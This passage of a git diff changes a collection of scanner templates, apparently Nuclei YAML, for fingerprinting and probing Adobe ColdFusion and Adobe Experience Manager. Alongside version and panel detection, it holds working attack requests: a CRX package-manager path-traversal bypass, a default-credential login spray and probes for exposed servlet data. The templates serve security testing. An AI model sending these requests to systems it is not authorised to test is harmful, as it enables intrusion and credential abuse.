./poc/xss/wp-slideshow-xss-11574.yaml -./poc/xss/wp-slideshow-xss-11575.yaml +./poc/xss/wp-slideshow-xss-11576.yaml ./poc/xss/wp-slideshow-xss.yaml -./poc/xss/wp-socialfit-xss-11577.yaml ./poc/xss/wp-socialfit-xss-11579.yaml ./poc/xss/wp-socialfit-xss-11580.yaml ./poc/xss/wp-socialfit-xss-11581.yaml @@ -103285,6 +103310,7 @@ ./poc/xss/wp-whmcs-xss-11614.yaml ./poc/xss/wp-whmcs-xss.yaml ./poc/xss/wpmudev-my-calender-xss-11502.yaml +./poc/xss/wpmudev-my-calender-xss-11503.yaml ./poc/xss/wpmudev-my-calender-xss.yaml ./poc/xss/xss-check.yaml ./poc/xss/xss-fuzz.yaml diff --git a/poc/adobe/adobe-coldfusion-detect-82.yaml b/poc/adobe/adobe-coldfusion-detect-82.yaml deleted file mode 100644 index e19f7d4be2..0000000000 --- a/poc/adobe/adobe-coldfusion-detect-82.yaml +++ /dev/null @@ -1,68 +0,0 @@ -id: adobe-coldfusion-detect - -info: - name: Adobe ColdFusion Detector - author: philippedelteil - severity: info - description: With this template we can detect the version number of Coldfusion instances based on their logos. - metadata: - verified: true - max-request: 6 - shodan-query: http.component:"Adobe ColdFusion" - tags: adobe,coldfusion,tech - -http: - - method: GET - path: - - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif" - - "{{BaseURL}}/cfide/administrator/images/mx_login.gif" - - "{{BaseURL}}/CFIDE/administrator/images/background.jpg" - - "{{BaseURL}}/cfide/administrator/images/background.jpg" - - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg" - - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg" - - host-redirects: true - stop-at-first-match: true - max-redirects: 2 - matchers: - - type: dsl - name: "coldfusion-8" - dsl: - - "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))" - - - type: dsl - name: "coldfusion-9" - dsl: - - "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))" - - - type: dsl - name: "coldfusion-10" - dsl: - - "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))" - - - type: dsl - name: "coldfusion-11" - dsl: - - "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))" - - - type: dsl - name: "coldfusion-2016" - dsl: - - "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))" - - - type: dsl - name: "coldfusion-2021" - dsl: - - "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))" - - - type: dsl - name: "coldfusion-2018" - dsl: - - "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))" - - - type: dsl - name: "coldfusion-mx-7" - dsl: - - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" - -# digest: 4a0a00473045022100faa12701b8bc27ab386795db36e16861a6a66b66d8fb9cd15ac80cb9409141df02205a53027693929221e1489f3e72cf8d72c2b6061ffced415bc66e005548780060:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/adobe-coldfusion-detect.yaml b/poc/adobe/adobe-coldfusion-detect.yaml new file mode 100644 index 0000000000..0d9330c87c --- /dev/null +++ b/poc/adobe/adobe-coldfusion-detect.yaml @@ -0,0 +1,62 @@ +id: adobe-coldfusion-detect + +info: + name: Adobe ColdFusion Detector + author: philippedelteil + severity: info + description: With this template we can detect the version number of Coldfusion instances based on their logos. + tags: adobe,coldfusion + +requests: + - method: GET + path: + - "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif" + - "{{BaseURL}}/cfide/administrator/images/mx_login.gif" + - "{{BaseURL}}/CFIDE/administrator/images/background.jpg" + - "{{BaseURL}}/cfide/administrator/images/background.jpg" + - "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg" + - "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg" + + redirects: true + stop-at-first-match: true + max-redirects: 2 + matchers: + - type: dsl + name: "coldfusion-8" + dsl: + - "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))" + + - type: dsl + name: "coldfusion-9" + dsl: + - "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))" + + - type: dsl + name: "coldfusion-10" + dsl: + - "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))" + + - type: dsl + name: "coldfusion-11" + dsl: + - "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))" + + - type: dsl + name: "coldfusion-2016" + dsl: + - "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))" + + - type: dsl + name: "coldfusion-2021" + dsl: + - "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))" + + - type: dsl + name: "coldfusion-2018" + dsl: + - "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))" + + - type: dsl + name: "coldfusion-mx-7" + dsl: + - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" diff --git a/poc/adobe/adobe-coldfusion-error-detect-86.yaml b/poc/adobe/adobe-coldfusion-error-detect-86.yaml index 57e6f15254..efe9fab702 100644 --- a/poc/adobe/adobe-coldfusion-error-detect-86.yaml +++ b/poc/adobe/adobe-coldfusion-error-detect-86.yaml @@ -9,10 +9,11 @@ info: - https://twitter.com/PhilippeDelteil/status/1418622775829348358 metadata: verified: true + max-request: 1 shodan-query: http.component:"Adobe ColdFusion" - tags: adobe,coldfusion + tags: adobe,coldfusion,tech -requests: +http: - method: GET path: - "{{BaseURL}}/_something_.cfm" @@ -27,3 +28,5 @@ requests: - type: status status: - 404 + +# digest: 4a0a00473045022068efa69e7486fc3192208ad0e2a27d0f5617cd74743f02d143f7bb64af6556da022100b5540b7df95ff7b71b3394a2f63ddd5e42d5473d8c6febd42195b9fa73496c27:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/adobe-coldfusion-error-detect.yaml b/poc/adobe/adobe-coldfusion-error-detect-88.yaml similarity index 100% rename from poc/adobe/adobe-coldfusion-error-detect.yaml rename to poc/adobe/adobe-coldfusion-error-detect-88.yaml diff --git a/poc/adobe/adobe-component-login-89.yaml b/poc/adobe/adobe-component-login-89.yaml new file mode 100644 index 0000000000..9b423f9a58 --- /dev/null +++ b/poc/adobe/adobe-component-login-89.yaml @@ -0,0 +1,32 @@ +id: adobe-coldfusion-login + +info: + name: Adobe ColdFusion Component Browser Login Panel + author: dhiyaneshDK + description: An Adobe ColdFusion Component Browser login panel was detected. + severity: info + reference: + - https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe,coldfusion + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-component-login-90.yaml b/poc/adobe/adobe-component-login-90.yaml deleted file mode 100644 index 1d46e94118..0000000000 --- a/poc/adobe/adobe-component-login-90.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: adobe-coldfusion-login - -info: - name: Adobe ColdFusion Component Browser Login Panel - author: dhiyaneshDK - severity: info - description: An Adobe ColdFusion Component Browser login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6846 - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - tags: panel,adobe,coldfusion - -requests: - - method: GET - path: - - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - - '{{BaseURL}}/cfide/componentutils/login.cfm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Component Browser Login' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-connect-central-login-95.yaml b/poc/adobe/adobe-connect-central-login-95.yaml deleted file mode 100644 index 9f025cb957..0000000000 --- a/poc/adobe/adobe-connect-central-login-95.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: adobe-connect-central-login - -info: - name: Adobe Connect Central Login Panel - author: dhiyaneshDk - severity: info - description: An Adobe Connect Central login panel was detected. - reference: - - https://www.adobe.com/products/adobeconnect.html - classification: - cwe-id: CWE-200 - tags: adobe,panel,connect-central - -requests: - - method: GET - path: - - "{{BaseURL}}/system/login" - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Connect Central Login' - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-connect-central-login.yaml b/poc/adobe/adobe-connect-central-login.yaml index efbb0d1e8f..9f025cb957 100644 --- a/poc/adobe/adobe-connect-central-login.yaml +++ b/poc/adobe/adobe-connect-central-login.yaml @@ -9,11 +9,9 @@ info: - https://www.adobe.com/products/adobeconnect.html classification: cwe-id: CWE-200 - metadata: - max-request: 1 tags: adobe,panel,connect-central -http: +requests: - method: GET path: - "{{BaseURL}}/system/login" @@ -29,4 +27,4 @@ http: status: - 200 -# digest: 490a00463044022022b5794732a33194d5b4d44da887ecaeb96b05c239c162afcf21c7a7c752e0ac022042c44f3116cfe5a503240785509d78880bb849f0fdfb10e19f37e184b7aaeecc:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-connect-username-exposure-100.yaml b/poc/adobe/adobe-connect-username-exposure-100.yaml deleted file mode 100644 index 2e4d3089a9..0000000000 --- a/poc/adobe/adobe-connect-username-exposure-100.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - author: dhiyaneshDk - severity: low - reference: - - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 diff --git a/poc/adobe/adobe-connect-username-exposure-101.yaml b/poc/adobe/adobe-connect-username-exposure-98.yaml similarity index 100% rename from poc/adobe/adobe-connect-username-exposure-101.yaml rename to poc/adobe/adobe-connect-username-exposure-98.yaml diff --git a/poc/adobe/adobe-connect-version-102.yaml b/poc/adobe/adobe-connect-version-102.yaml new file mode 100644 index 0000000000..95b454f2f8 --- /dev/null +++ b/poc/adobe/adobe-connect-version-102.yaml @@ -0,0 +1,32 @@ +id: adobe-connect-version + +info: + name: Adobe Connect Central Version + author: dhiyaneshDk + severity: info + metadata: + max-request: 1 + tags: adobe,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/version.txt" + + matchers-condition: and + matchers: + - type: word + words: + - 'package=' + part: body + + - type: word + words: + - 'text/plain' + part: header + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100e63b3b76732fe722d3d76c704705f5f1fdab83c771742ce8a0f8cd2ed2fa2e5c022053f49fe20114fce1d298f13d19d4b25108498ca1d7f3591f4c6cd033205b4d09:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/adobe-connect-version.yaml b/poc/adobe/adobe-connect-version-104.yaml similarity index 100% rename from poc/adobe/adobe-connect-version.yaml rename to poc/adobe/adobe-connect-version-104.yaml diff --git a/poc/adobe/adobe-experience-manager-login-105.yaml b/poc/adobe/adobe-experience-manager-login-105.yaml new file mode 100644 index 0000000000..4dbdef1e18 --- /dev/null +++ b/poc/adobe/adobe-experience-manager-login-105.yaml @@ -0,0 +1,33 @@ +id: adobe-experience-manager-login + +info: + name: Adobe Experience Manager Login Panel + author: dhiyaneshDK + description: An Adobe Experience Manager login panel was detected. + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + tags: panel,aem,adobe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/granite/core/content/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'AEM Sign In' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-experience-manager-login-106.yaml b/poc/adobe/adobe-experience-manager-login-106.yaml deleted file mode 100644 index 2162a6646f..0000000000 --- a/poc/adobe/adobe-experience-manager-login-106.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: adobe-experience-manager-login - -info: - name: Adobe-Experience-Manager - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - tags: panel,aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/granite/core/content/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'AEM Sign In' - - - type: status - status: - - 200 diff --git a/poc/adobe/adobe-experience-manager-login.yaml b/poc/adobe/adobe-experience-manager-login.yaml index 9c41d198e2..2162a6646f 100644 --- a/poc/adobe/adobe-experience-manager-login.yaml +++ b/poc/adobe/adobe-experience-manager-login.yaml @@ -1,20 +1,13 @@ id: adobe-experience-manager-login info: - name: Adobe Experience Manager Login Panel + name: Adobe-Experience-Manager author: dhiyaneshDK severity: info - description: An Adobe Experience Manager login panel was detected. - reference: - - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html - classification: - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"AEM Sign In" + reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 tags: panel,aem,adobe -http: +requests: - method: GET path: - '{{BaseURL}}/libs/granite/core/content/login.html' @@ -28,5 +21,3 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210087445f31466e985cdd51946d605a4855acf8185177ea47e0b25cddb5bc30d6b1022100fa9cfd52ea1a651a16f8bcab373286587df6dfd27ff26cc2e3f9960233384744:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/adobe-media-server-113.yaml b/poc/adobe/adobe-media-server-113.yaml index be87f46642..5fb03ce9f3 100644 --- a/poc/adobe/adobe-media-server-113.yaml +++ b/poc/adobe/adobe-media-server-113.yaml @@ -1,23 +1,32 @@ -id: adobe-media-server - -info: - name: Adobe Media Server - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 - tags: panel,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Media Server' - - - type: status - status: - - 200 +id: adobe-media-server + +info: + name: Adobe Media Server Login Panel + author: dhiyaneshDK + severity: info + description: An Adobe Media Server login panel was detected. + reference: + - https://helpx.adobe.com/support/adobe-media-server.html + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: http.title:"Adobe Media Server" + tags: panel,adobe + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe Media Server' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100a7fdf172f6f056f8d141a0d36a11e07be1db35d83d5497ff1747a7763e449505022100b06e6481fb3fb9cafe9b1ee597924f4ccd349f8b8bce5b6a5ecf98fb6c11383e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-bg-servlet-127.yaml b/poc/adobe/aem-bg-servlet-127.yaml deleted file mode 100644 index 3fa1629768..0000000000 --- a/poc/adobe/aem-bg-servlet-127.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: aem-bg-servlet - -info: - author: DhiyaneshDk - name: AEM BG-Servlets - severity: info - reference: https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 - tags: aem - -requests: - - method: GET - path: - - '{{BaseURL}}/system/bgservlets/test.css' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '
Flushing output
' \ No newline at end of file diff --git a/poc/adobe/aem-bg-servlet.yaml b/poc/adobe/aem-bg-servlet-129.yaml similarity index 100% rename from poc/adobe/aem-bg-servlet.yaml rename to poc/adobe/aem-bg-servlet-129.yaml diff --git a/poc/adobe/aem-crx-bypass-134.yaml b/poc/adobe/aem-crx-bypass-134.yaml index a6187d442a..6607f936be 100644 --- a/poc/adobe/aem-crx-bypass-134.yaml +++ b/poc/adobe/aem-crx-bypass-134.yaml @@ -1,12 +1,10 @@ id: aem-crx-bypass - info: author: dhiyaneshDK name: AEM CRX Bypass severity: critical reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ tags: aem - requests: - raw: - | @@ -14,13 +12,11 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate - - | GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate - matchers-condition: and matchers: - type: word @@ -30,12 +26,10 @@ requests: - 'downloadName' - 'acHandling' condition: and - - type: word part: header words: - 'application/json' - - type: status status: - 200 diff --git a/poc/adobe/aem-default-get-servlet-135.yaml b/poc/adobe/aem-default-get-servlet-135.yaml deleted file mode 100644 index 7842d3d3da..0000000000 --- a/poc/adobe/aem-default-get-servlet-135.yaml +++ /dev/null @@ -1,91 +0,0 @@ -id: aem-default-get-servlet -info: - author: DhiyaneshDk - name: AEM DefaultGetServlet - severity: low - description: Sensitive information might be exposed via AEM DefaultGetServlet. - reference: - - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java - tags: aem,adobe - - -requests: - - method: GET - path: - - '{{BaseURL}}/etc' - - '{{BaseURL}}/var' - - '{{BaseURL}}/apps' - - '{{BaseURL}}/home' - - '{{BaseURL}}///etc' - - '{{BaseURL}}///var' - - '{{BaseURL}}///apps' - - '{{BaseURL}}///home' - - '{{BaseURL}}/.json' - - '{{BaseURL}}/.1.json' - - '{{BaseURL}}/....4.2.1....json' - - '{{BaseURL}}/.json?FNZ.css' - - '{{BaseURL}}/.json?FNZ.ico' - - '{{BaseURL}}/.json?FNZ.html' - - '{{BaseURL}}/.json/FNZ.css' - - '{{BaseURL}}/.json/FNZ.html' - - '{{BaseURL}}/.json/FNZ.png' - - '{{BaseURL}}/.json/FNZ.ico' - - '{{BaseURL}}/.children.1.json' - - '{{BaseURL}}/.children....4.2.1....json' - - '{{BaseURL}}/.children.json?FNZ.css' - - '{{BaseURL}}/.children.json?FNZ.ico' - - '{{BaseURL}}/.children.json?FNZ.html' - - '{{BaseURL}}/.children.json/FNZ.css' - - '{{BaseURL}}/.children.json/FNZ.html' - - '{{BaseURL}}/.children.json/FNZ.png' - - '{{BaseURL}}/.children.json/FNZ.ico' - - '{{BaseURL}}/etc.json' - - '{{BaseURL}}/etc.1.json' - - '{{BaseURL}}/etc....4.2.1....json' - - '{{BaseURL}}/etc.json?FNZ.css' - - '{{BaseURL}}/etc.json?FNZ.ico' - - '{{BaseURL}}/etc.json?FNZ.html' - - '{{BaseURL}}/etc.json/FNZ.css' - - '{{BaseURL}}/etc.json/FNZ.html' - - '{{BaseURL}}/etc.json/FNZ.ico' - - '{{BaseURL}}/etc.children.json' - - '{{BaseURL}}/etc.children.1.json' - - '{{BaseURL}}/etc.children....4.2.1....json' - - '{{BaseURL}}/etc.children.json?FNZ.css' - - '{{BaseURL}}/etc.children.json?FNZ.ico' - - '{{BaseURL}}/etc.children.json?FNZ.html' - - '{{BaseURL}}/etc.children.json/FNZ.css' - - '{{BaseURL}}/etc.children.json/FNZ.html' - - '{{BaseURL}}/etc.children.json/FNZ.png' - - '{{BaseURL}}/etc.children.json/FNZ.ico' - - '{{BaseURL}}///etc.json' - - '{{BaseURL}}///etc.1.json' - - '{{BaseURL}}///etc....4.2.1....json' - - '{{BaseURL}}///etc.json?FNZ.css' - - '{{BaseURL}}///etc.json?FNZ.ico' - - '{{BaseURL}}///etc.json/FNZ.html' - - '{{BaseURL}}///etc.json/FNZ.png' - - '{{BaseURL}}///etc.json/FNZ.ico' - - '{{BaseURL}}///etc.children.json' - - '{{BaseURL}}///etc.children.1.json' - - '{{BaseURL}}///etc.children....4.2.1....json' - - '{{BaseURL}}///etc.children.json?FNZ.css' - - '{{BaseURL}}///etc.children.json?FNZ.ico' - - '{{BaseURL}}///etc.children.json?FNZ.html' - - '{{BaseURL}}///etc.children.json/FNZ.css' - - '{{BaseURL}}///etc.children.json/FNZ.html' - - '{{BaseURL}}///etc.children.json/FNZ.png' - - '{{BaseURL}}///etc.children.json/FNZ.ico' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'jcr:createdBy' - condition: and diff --git a/poc/adobe/aem-default-get-servlet-137.yaml b/poc/adobe/aem-default-get-servlet-137.yaml new file mode 100644 index 0000000000..d3546ab204 --- /dev/null +++ b/poc/adobe/aem-default-get-servlet-137.yaml @@ -0,0 +1,78 @@ +id: aem-default-get-servlet +info: + author: DhiyaneshDk + name: AEM DefaultGetServlet + severity: low + reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/.json' + - '{{BaseURL}}/.1.json' + - '{{BaseURL}}/....4.2.1....json' + - '{{BaseURL}}/.json?FNZ.css' + - '{{BaseURL}}/.json?FNZ.ico' + - '{{BaseURL}}/.json?FNZ.html' + - '{{BaseURL}}/.json/FNZ.css' + - '{{BaseURL}}/.json/FNZ.html' + - '{{BaseURL}}/.json/FNZ.png' + - '{{BaseURL}}/.json/FNZ.ico' + - '{{BaseURL}}/.children.1.json' + - '{{BaseURL}}/.children....4.2.1....json' + - '{{BaseURL}}/.children.json?FNZ.css' + - '{{BaseURL}}/.children.json?FNZ.ico' + - '{{BaseURL}}/.children.json?FNZ.html' + - '{{BaseURL}}/.children.json/FNZ.css' + - '{{BaseURL}}/.children.json/FNZ.html' + - '{{BaseURL}}/.children.json/FNZ.png' + - '{{BaseURL}}/.children.json/FNZ.ico' + - '{{BaseURL}}/etc.json' + - '{{BaseURL}}/etc.1.json' + - '{{BaseURL}}/etc....4.2.1....json' + - '{{BaseURL}}/etc.json?FNZ.css' + - '{{BaseURL}}/etc.json?FNZ.ico' + - '{{BaseURL}}/etc.json?FNZ.html' + - '{{BaseURL}}/etc.json/FNZ.css' + - '{{BaseURL}}/etc.json/FNZ.html' + - '{{BaseURL}}/etc.json/FNZ.ico' + - '{{BaseURL}}/etc.children.json' + - '{{BaseURL}}/etc.children.1.json' + - '{{BaseURL}}/etc.children....4.2.1....json' + - '{{BaseURL}}/etc.children.json?FNZ.css' + - '{{BaseURL}}/etc.children.json?FNZ.ico' + - '{{BaseURL}}/etc.children.json?FNZ.html' + - '{{BaseURL}}/etc.children.json/FNZ.css' + - '{{BaseURL}}/etc.children.json/FNZ.html' + - '{{BaseURL}}/etc.children.json/FNZ.png' + - '{{BaseURL}}/etc.children.json/FNZ.ico' + - '{{BaseURL}}///etc.json' + - '{{BaseURL}}///etc.1.json' + - '{{BaseURL}}///etc....4.2.1....json' + - '{{BaseURL}}///etc.json?FNZ.css' + - '{{BaseURL}}///etc.json?FNZ.ico' + - '{{BaseURL}}///etc.json/FNZ.html' + - '{{BaseURL}}///etc.json/FNZ.png' + - '{{BaseURL}}///etc.json/FNZ.ico' + - '{{BaseURL}}///etc.children.json' + - '{{BaseURL}}///etc.children.1.json' + - '{{BaseURL}}///etc.children....4.2.1....json' + - '{{BaseURL}}///etc.children.json?FNZ.css' + - '{{BaseURL}}///etc.children.json?FNZ.ico' + - '{{BaseURL}}///etc.children.json?FNZ.html' + - '{{BaseURL}}///etc.children.json/FNZ.css' + - '{{BaseURL}}///etc.children.json/FNZ.html' + - '{{BaseURL}}///etc.children.json/FNZ.png' + - '{{BaseURL}}///etc.children.json/FNZ.ico' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'jcr:createdBy' + condition: and diff --git a/poc/adobe/aem-default-get-servlet.yaml b/poc/adobe/aem-default-get-servlet.yaml index 008fa65fb6..7842d3d3da 100644 --- a/poc/adobe/aem-default-get-servlet.yaml +++ b/poc/adobe/aem-default-get-servlet.yaml @@ -1,19 +1,16 @@ id: aem-default-get-servlet - info: - name: AEM DefaultGetServlet author: DhiyaneshDk + name: AEM DefaultGetServlet severity: low description: Sensitive information might be exposed via AEM DefaultGetServlet. reference: - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java - metadata: - max-request: 64 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe,misconfig + tags: aem,adobe -http: + +requests: - method: GET path: - '{{BaseURL}}/etc' @@ -82,7 +79,6 @@ http: - '{{BaseURL}}///etc.children.json/FNZ.ico' stop-at-first-match: true - matchers-condition: and matchers: - type: status @@ -93,5 +89,3 @@ http: words: - 'jcr:createdBy' condition: and - -# digest: 4a0a00473045022100e488c473b0ca04235cac72efdb586f80e8fc7ed6b9c887639b0655f9cc0fe1dd0220255b32fb575b48097750c878a707ac400fab98127da302708288f8e36e926a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-default-login-140.yaml b/poc/adobe/aem-default-login-140.yaml new file mode 100644 index 0000000000..8072025a73 --- /dev/null +++ b/poc/adobe/aem-default-login-140.yaml @@ -0,0 +1,56 @@ +id: aem-default-login + +info: + name: Adobe AEM Default Login + author: random-robbie + severity: high + description: Adobe AEM default login credentials were discovered. + reference: + - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: aem,default-login,adobe + + +requests: + - raw: + - | + POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/libs/granite/core/content/login.html + + _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true + + attack: pitchfork + payloads: + aem_user: + - admin + - grios + - replication-receiver + - vgnadmin + + aem_pass: + - admin + - password + - replication-receiver + - vgnadmin + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + condition: and + words: + - login-token + - crx.default + +# Enhanced by mp on 2022/03/23 diff --git a/poc/adobe/aem-default-login-142.yaml b/poc/adobe/aem-default-login-142.yaml index 8072025a73..30c718c891 100644 --- a/poc/adobe/aem-default-login-142.yaml +++ b/poc/adobe/aem-default-login-142.yaml @@ -11,10 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 8 + shodan-query: http.component:"Adobe Experience Manager" tags: aem,default-login,adobe - -requests: +http: - raw: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 @@ -32,14 +34,21 @@ requests: - grios - replication-receiver - vgnadmin - + - author + - anonymous + - jdoe@geometrixx.info + - aparker@geometrixx.info aem_pass: - admin - password - replication-receiver - vgnadmin - + - author + - anonymous + - jdoe + - aparker stop-at-first-match: true + matchers-condition: and matchers: - type: status @@ -48,9 +57,9 @@ requests: - type: word part: header - condition: and words: - login-token - crx.default + condition: and -# Enhanced by mp on 2022/03/23 +# digest: 4a0a004730450220222a3b892a7451300a85043c153a1fbe5d336d8c9f30c474065214bbac5906bc022100981335810687d458df2fb4ca0c7698ec9597777f599956f12f0a62b18f285727:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-detaction.yaml b/poc/adobe/aem-detaction.yaml deleted file mode 100644 index 4c92b48c8b..0000000000 --- a/poc/adobe/aem-detaction.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: favicon-detection-AEM - -info: - name: favicon-detection-AEM (Adobe Experience Manager) - severity: info - author: shifacyclewala hackergautam - reference: | - - https://twitter.com/brsn76945860/status/1171233054951501824 - - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a - - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - - https://github.com/devanshbatham/FavFreak - - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv - -requests: - - method: GET - path: - - "{{BaseURL}}/libs/granite/core/content/login/favicon.ico" - - redirects: true - max-redirects: 2 - - matchers: - - type: dsl - name: "Adobe Experience Manager (AEM)" - dsl: - - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/poc/adobe/aem-detection-144.yaml b/poc/adobe/aem-detection-144.yaml new file mode 100644 index 0000000000..882cca92b6 --- /dev/null +++ b/poc/adobe/aem-detection-144.yaml @@ -0,0 +1,28 @@ +id: aem-detection + +info: + name: Favicon based AEM Detection + author: shifacyclewala,hackergautam + severity: info + reference: + - https://twitter.com/brsn76945860/status/1171233054951501824 + - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a + - 